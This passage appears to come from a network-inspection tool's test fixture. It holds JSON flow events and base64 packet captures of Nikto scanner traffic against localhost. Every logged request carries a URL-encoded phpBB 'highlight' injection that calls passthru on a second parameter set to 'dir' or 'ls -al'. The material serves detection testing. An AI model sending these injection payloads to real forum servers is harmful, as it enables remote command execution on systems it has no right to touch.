{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7560000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00856{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_packet_id":1,"flow_last_seen":1576420277790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":1576420277790,"pkt":"AAAAAAAAAAAAAAAACABFAAFMIAVAAEAGG6V\/AAABfwAAAcboH5Bd5RklMuM7\/YAYAED\/QAAAAQEICp1m\/0adZv9GR0VUIC9mb3J1bS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01198{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7560000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7560000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_packet_id":1,"flow_last_seen":1576420277792,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"thread_ts_msec":1576420277792,"pkt":"AAAAAAAAAAAAAAAACABFAAFfB5NAAEAGNAR\/AAABfwAAAcbqH5CefT66jrIPCIAYAED\/UwAAAQEICp1m\/0idZv9HR0VUIC9pbmRleC5waHA\/bmFtZT1QTnBocEJCMiZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7560000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001393)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_packet_id":1,"flow_last_seen":1576420277794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277794,"pkt":"AAAAAAAAAAAAAAAACABFAAFmgStAAEAGumR\/AAABfwAAAcbsH5DtZbgCN0MtSoAYAED\/WgAAAQEICp1m\/0qdZv9KR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001394)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277795,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_packet_id":1,"flow_last_seen":1576420277795,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277795,"pkt":"AAAAAAAAAAAAAAAACABFAAFmgfFAAEAGuZ5\/AAABfwAAAcbuH5ChILjHXT7L3YAYAED\/WgAAAQEICp1m\/0udZv9LR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NSkNCg0K"} +01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277795,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001395)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00859{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_packet_id":1,"flow_last_seen":1576420277797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"thread_ts_msec":1576420277797,"pkt":"AAAAAAAAAAAAAAAACABFAAFPlMhAAEAGpt5\/AAABfwAAAcbwH5AHpq3wv20OaIAYAED\/QwAAAQEICp1m\/02dZv9NR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01200{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":683,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001396)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277799,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_packet_id":1,"flow_last_seen":1576420277799,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277799,"pkt":"AAAAAAAAAAAAAAAACABFAAFm4IpAAEAGWwV\/AAABfwAAAcbyH5CWqtmi9bUd64AYAED\/WgAAAQEICp1m\/0+dZv9PR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCg0K"} +01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277799,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277800,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_packet_id":1,"flow_last_seen":1576420277800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277800,"pkt":"AAAAAAAAAAAAAAAACABFAAFvelxAAEAGwSp\/AAABfwAAAcb0H5AcBENxXyULZYAYAED\/YwAAAQEICp1m\/1CdZv9QR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01233{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277800,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7560000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277802,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00907{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_packet_id":1,"flow_last_seen":1576420277802,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1576420277802,"pkt":"AAAAAAAAAAAAAAAACABFAAF0IClAAEAGG1l\/AAABfwAAAcb2H5CLkRkOnTgF7oAYAED\/aAAAAQEICp1m\/1GdZv9RR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KDQo="} +01239{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7560000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277802,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7560000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_packet_id":1,"flow_last_seen":1576420277803,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":380,"pkt_l4_len":346,"thread_ts_msec":1576420277803,"pkt":"AAAAAAAAAAAAAAAACABFAAFudhVAAEAGxXJ\/AAABfwAAAcb4H5C7R086db2J2oAYAED\/YgAAAQEICp1m\/1OdZv9TR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01232{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7560000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 